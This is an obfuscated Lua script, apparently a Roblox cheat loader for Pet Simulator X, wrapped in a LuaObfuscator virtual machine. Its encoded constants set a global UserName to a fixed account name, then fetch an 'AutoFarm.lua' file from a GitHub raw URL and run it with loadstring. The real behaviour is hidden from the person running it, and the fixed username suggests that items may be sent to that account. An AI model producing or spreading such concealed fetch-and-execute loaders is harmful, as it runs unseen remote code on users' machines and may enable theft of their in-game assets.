--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.4) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v77=v5(v69,v19);v19=nil;return v77;else return v69;end end end);local function v20(v31,v32,v33) if v33 then local v70=0;local v71;while true do if (v70==(0 -0)) then v71=(v31/(((5 + 0) -(3 -0))^(v32-((1066 -(68 + 997)) -0))))%(2^(((v33-(2 -1)) -(v32-(1271 -(226 + 1044)))) + (620 -(555 + 64)))) ;return v71-(v71%(932 -(857 + 74))) ;end end else local v72=568 -((1244 -(282 + 595)) + (1838 -(1523 + 114))) ;local v73;while true do if (v72==0) then v73=(929 -(214 + (3104 -2391)))^(v32-(118 -(32 + 85))) ;return (((v31%(v73 + v73))>=v73) and (1 + 0)) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v36 * 256) + v35 ;end local function v23() local v37=0;local v38;local v39;local v40;local v41;while true do if (v37==(958 -(892 + 65))) then return (v41 * ((98261963 -58239400) -23245347)) + (v40 * (121138 -55602)) + (v39 * (469 -213)) + v38 ;end if (v37==(350 -(87 + 263))) then v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 84 + 29)) );v18=v18 + 4 ;v37=(3 -2) + 0 ;end end end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(953 -(802 + 150))) then v45=2 -1 ;v46=(v20(v44,439 -(145 + 293) ,36 -(1929 -(1789 + 124)) ) * (2^(24 + 8))) + v43 ;v42=999 -(915 + 82) ;end if (v42==((774 -(745 + 21)) -5)) then if (v47==(772 -(201 + 571))) then if (v46==(0 + 0)) then return v48 * ((0 + 0) -0) ;else v47=1188 -(1069 + 118) ;v45=0 -0 ;end elseif (v47==(7472 -5425)) then return ((v46==(0 -0)) and (v48 * ((860 -(814 + (123 -78)))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-((219 -163) + 967) ) * (v45 + (v46/((1 + 1)^(10 + 42)))) ;end if (v42==0) then v43=v23();v44=v23();v42=1 -0 ;end if (v42==(2 + 0 + 0)) then v47=v20(v44,812 -(368 + 423) ,31);v48=((v20(v44,100 -68 )==(4 -3)) and  -(19 -(10 + 8))) or (3 -(2 + 0)) ;v42=445 -(416 + 26) ;end end end local function v25(v49) local v50=1055 -(87 + 968) ;local v51;local v52;while true do if (v50==(8 -6)) then v52={};for v78=1, #v51 do v52[v78]=v2(v1(v3(v51,v78,v78)));end v50=3 + 0 ;end if (v50==0) then v51=nil;if  not v49 then local v94=0;while true do if (((0 + 0) -(0 -0))==v94) then v49=v23();if (v49==(1413 -(447 + 966))) then return "";end break;end end end v50=2 -(15 -(9 + 5)) ;end if (v50==1) then v51=v3(v16,v18,(v18 + v49) -(1818 -(1703 + 114)) );v18=v18 + v49 ;v50=(1079 -(85 + 291)) -(376 + 325) ;end if (v50==(4 -(2 -1))) then return v6(v52);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==3) then v60=nil;v61=nil;v53=4;end if (v53==2) then v58=nil;v59=nil;v53=5 -2 ;end if (v53==0) then v54=0 -0 ;v55=nil;v53=1;end if (v53==(4 + 0)) then while true do if (v54~=(0 + 0)) then else local v98=0 -0 ;while true do if (v98~=(65 -(30 + 35))) then else v55=0 + 0 ;v56=nil;v98=1258 -(1043 + 214) ;end if (v98==(3 -2)) then v54=1213 -(323 + 889) ;break;end end end if (v54==3) then v61=nil;while true do local v101=0;while true do if (v101~=(2 -1)) then else if (v55~=2) then else local v106=580 -(361 + 219) ;local v107;while true do if (0~=v106) then else v107=320 -(53 + 267) ;while true do if (v107~=(0 + 0)) then else local v157=413 -(15 + 398) ;while true do if (v157~=(982 -(18 + 964))) then else for v169=1,v23() do local v170=0 -0 ;local v171;local v172;local v173;local v174;while true do if (v170~=1) then else v173=nil;v174=nil;v170=2 + 0 ;end if (v170==0) then v171=0;v172=nil;v170=1;end if (v170~=(2 + 0)) then else while true do if (v171==0) then v172=0;v173=nil;v171=851 -(20 + 830) ;end if (v171==1) then v174=nil;while true do if (v172==0) then local v186=0 + 0 ;while true do if ((127 -(116 + 10))~=v186) then else v172=1;break;end if (v186==0) then v173=0;v174=nil;v186=1;end end end if (v172~=(1 + 0)) then else while true do if (v173~=(738 -(542 + 196))) then else v174=v21();if (v20(v174,1,1 -0 )==(0 + 0)) then local v190=0;local v191;local v192;local v193;local v194;local v195;while true do if (v190~=(1 + 0)) then else v193=nil;v194=nil;v190=1 + 1 ;end if (v190~=(4 -2)) then else v195=nil;while true do if (v191~=2) then else while true do if ((7 -4)~=v192) then else if (v20(v194,1554 -(1126 + 425) ,408 -(118 + 287) )==(3 -2)) then v195[1125 -(118 + 1003) ]=v61[v195[11 -7 ]];end v56[v169]=v195;break;end if (v192~=1) then else local v199=377 -(142 + 235) ;local v200;while true do if (v199==0) then v200=0;while true do if (v200==(4 -3)) then v192=2;break;end if (v200~=(0 + 0)) then else local v209=977 -(553 + 424) ;while true do if (1~=v209) then else v200=1;break;end if (0==v209) then v195={v22(),v22(),nil,nil};if (v193==0) then local v210=0 -0 ;local v211;local v212;while true do if (v210~=0) then else v211=0;v212=nil;v210=1;end if (v210~=1) then else while true do if (0~=v211) then else v212=0;while true do if (v212==(0 + 0)) then v195[3 + 0 ]=v22();v195[4]=v22();break;end end break;end end break;end end elseif (v193==(1 + 0)) then v195[2 + 1 ]=v23();elseif (v193==(2 + 0)) then v195[3]=v23() -((4 -2)^(44 -28)) ;elseif (v193~=3) then else local v215=0 -0 ;local v216;local v217;while true do if (v215==(1 + 0)) then while true do if (v216==0) then v217=0 -0 ;while true do if (v217~=(753 -(239 + 514))) then else v195[2 + 1 ]=v23() -(2^(1345 -(797 + 532))) ;v195[4]=v22();break;end end break;end end break;end if (v215~=(0 + 0)) then else local v220=0;while true do if (v220==1) then v215=1;break;end if (v220~=0) then else v216=0 + 0 ;v217=nil;v220=1;end end end end end v209=2 -1 ;end end end end break;end end end if ((1204 -(373 + 829))~=v192) then else local v201=731 -(476 + 255) ;while true do if (1~=v201) then else v192=1133 -(369 + 761) ;break;end if (v201~=0) then else if (v20(v194,1,1)==1) then v195[2 + 0 ]=v61[v195[2 -0 ]];end if (v20(v194,3 -1 ,2)~=(239 -(64 + 174))) then else v195[1 + 2 ]=v61[v195[3]];end v201=1;end end end if (0~=v192) then else local v202=0;while true do if (v202==0) then v193=v20(v174,2 -0 ,3);v194=v20(v174,340 -(144 + 192) ,6);v202=1;end if (v202==1) then v192=217 -(42 + 174) ;break;end end end end break;end if (v191~=0) then else v192=0 + 0 ;v193=nil;v191=1;end if (v191~=1) then else local v197=0 + 0 ;while true do if (0~=v197) then else v194=nil;v195=nil;v197=1;end if (v197==(1 + 0)) then v191=2;break;end end end end break;end if (v190==0) then v191=1504 -(363 + 1141) ;v192=nil;v190=1;end end end break;end end break;end end break;end end break;end end end for v175=1581 -(1183 + 397) ,v23() do v57[v175-(2 -1) ]=v28();end v157=1;end if ((1 + 0)==v157) then v107=1;break;end end end if (v107~=(1 + 0)) then else return v59;end end break;end end end break;end if (v101~=(1975 -(1913 + 62))) then else if (v55==(1 + 0)) then local v108=0;local v109;while true do if (v108~=(0 -0)) then else v109=0;while true do if (0==v109) then local v158=0;while true do if (v158==0) then v60=v23();v61={};v158=1934 -(565 + 1368) ;end if ((3 -2)==v158) then v109=1662 -(1477 + 184) ;break;end end end if (v109~=(2 -0)) then else v55=2 + 0 ;break;end if (v109~=1) then else local v159=0;while true do if (v159==(856 -(564 + 292))) then for v177=1,v60 do local v178=0 -0 ;local v179;local v180;local v181;local v182;while true do if ((2 -1)==v178) then v181=nil;v182=nil;v178=2;end if (v178~=0) then else v179=0;v180=nil;v178=305 -(244 + 60) ;end if (2~=v178) then else while true do if (v179==(0 + 0)) then local v185=0;while true do if (v185==(477 -(41 + 435))) then v179=1002 -(938 + 63) ;break;end if (v185==0) then v180=0;v181=nil;v185=1 + 0 ;end end end if ((1126 -(936 + 189))~=v179) then else v182=nil;while true do if (v180==0) then local v187=0 + 0 ;local v188;while true do if (v187~=(1613 -(1565 + 48))) then else v188=0 + 0 ;while true do if (v188==(1138 -(782 + 356))) then local v196=267 -(176 + 91) ;while true do if (v196==1) then v188=2 -1 ;break;end if (0~=v196) then else v181=v21();v182=nil;v196=1 -0 ;end end end if (v188~=(1093 -(975 + 117))) then else v180=1876 -(157 + 1718) ;break;end end break;end end end if (v180==1) then if (v181==1) then v182=v21()~=(0 + 0) ;elseif (v181==(6 -4)) then v182=v24();elseif (v181==3) then v182=v25();end v61[v177]=v182;break;end end break;end end break;end end end v59[3]=v21();v159=1;end if (v159==(3 -2)) then v109=2;break;end end end end break;end end end if (v55~=0) then else local v110=1018 -(697 + 321) ;while true do if (v110~=(0 -0)) then else v56={};v57={};v110=1;end if (v110~=(1 -0)) then else v58={};v59={v56,v57,nil,v58};v110=2;end if ((3 -1)==v110) then v55=1;break;end end end v101=2 -1 ;end end end break;end if (v54~=2) then else local v99=1227 -(322 + 905) ;while true do if (v99~=(611 -(602 + 9))) then else v59=nil;v60=nil;v99=1;end if (v99==(1190 -(449 + 740))) then v54=875 -(826 + 46) ;break;end end end if (v54~=(948 -(245 + 702))) then else local v100=0;while true do if (v100==0) then v57=nil;v58=nil;v100=3 -2 ;end if (v100==1) then v54=2;break;end end end end break;end if (v53~=1) then else v56=nil;v57=nil;v53=1 + 1 ;end end end local function v29(v62,v63,v64) local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...) local v80=v66;local v81=v67;local v82=v68;local v83=v27;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v95=0,v88 do if (v95>=v82) then v86[v95-v82 ]=v87[v95 + 1 ];else v90[v95]=v87[v95 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=11) then if (v93<=5) then if (v93<=2) then if (v93<=0) then v90[v92[2]][v92[3]]=v92[4];elseif (v93>1) then v90[v92[2]]=v92[3];else for v151=v92[2],v92[3] do v90[v151]=nil;end end elseif (v93<=3) then if (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93==4) then v90[v92[2]][v92[3]]=v92[4];else v90[v92[2]]=v64[v92[3]];end elseif (v93<=8) then if (v93<=6) then local v113=v92[2];v90[v113]=v90[v113](v13(v90,v113 + 1 ,v85));elseif (v93==7) then v84=v92[3];else v90[v92[2]]=v92[3]~=0 ;end elseif (v93<=9) then v90[v92[2]]=v92[3]~=0 ;elseif (v93==10) then local v130=v92[2];local v131=v90[v92[3]];v90[v130 + 1 ]=v131;v90[v130]=v131[v92[4]];elseif (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93<=17) then if (v93<=14) then if (v93<=12) then for v119=v92[2],v92[3] do v90[v119]=nil;end elseif (v93==13) then v90[v92[2]]();else local v135=0;local v136;local v137;while true do if (v135==0) then v136=v92[2];v137=v90[v92[3]];v135=1;end if (v135==1) then v90[v136 + 1 ]=v137;v90[v136]=v137[v92[4]];break;end end end elseif (v93<=15) then v90[v92[2]]=v64[v92[3]];elseif (v93>16) then local v138=v92[2];local v139,v140=v83(v90[v138](v13(v90,v138 + 1 ,v92[3])));v85=(v140 + v138) -1 ;local v141=0;for v153=v138,v85 do v141=v141 + 1 ;v90[v153]=v139[v141];end else local v142=v92[2];v90[v142]=v90[v142](v13(v90,v142 + 1 ,v85));end elseif (v93<=20) then if (v93<=18) then do return;end elseif (v93>19) then v90[v92[2]]();else do return;end end elseif (v93<=21) then v84=v92[3];elseif (v93>22) then v90[v92[2]]=v92[3];else local v146=0;local v147;local v148;local v149;local v150;while true do if (v146==2) then for v166=v147,v85 do local v167=0;while true do if (v167==0) then v150=v150 + 1 ;v90[v166]=v148[v150];break;end end end break;end if (v146==0) then v147=v92[2];v148,v149=v83(v90[v147](v13(v90,v147 + 1 ,v92[3])));v146=1;end if (v146==1) then v85=(v149 + v147) -1 ;v150=0;v146=2;end end end v84=v84 + 1 ;end end;end if (0==v65) then v66=v62[1];v67=v62[2];v65=1;end end end return v29(v28(),{},v17)(...);end return v15("LOL!083O00028O0003023O005F4703083O00557365724E616D65030A3O0072616E69656C5F6A7564030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F7258536372697074732F6D61696E2F4175746F4661726D2E6C756100163O0012173O00014O000C000100013O0026033O0002000100010004153O00020001001217000100013O00260300010005000100010004153O0005000100120F000200023O00300400020003000400120F000200053O00120F000300063O00200E000300030007001217000500084O0009000600014O0011000300064O001000023O00022O00140002000100010004153O001500010004153O000500010004153O001500010004153O000200012O00133O00017O00",v9(),...);
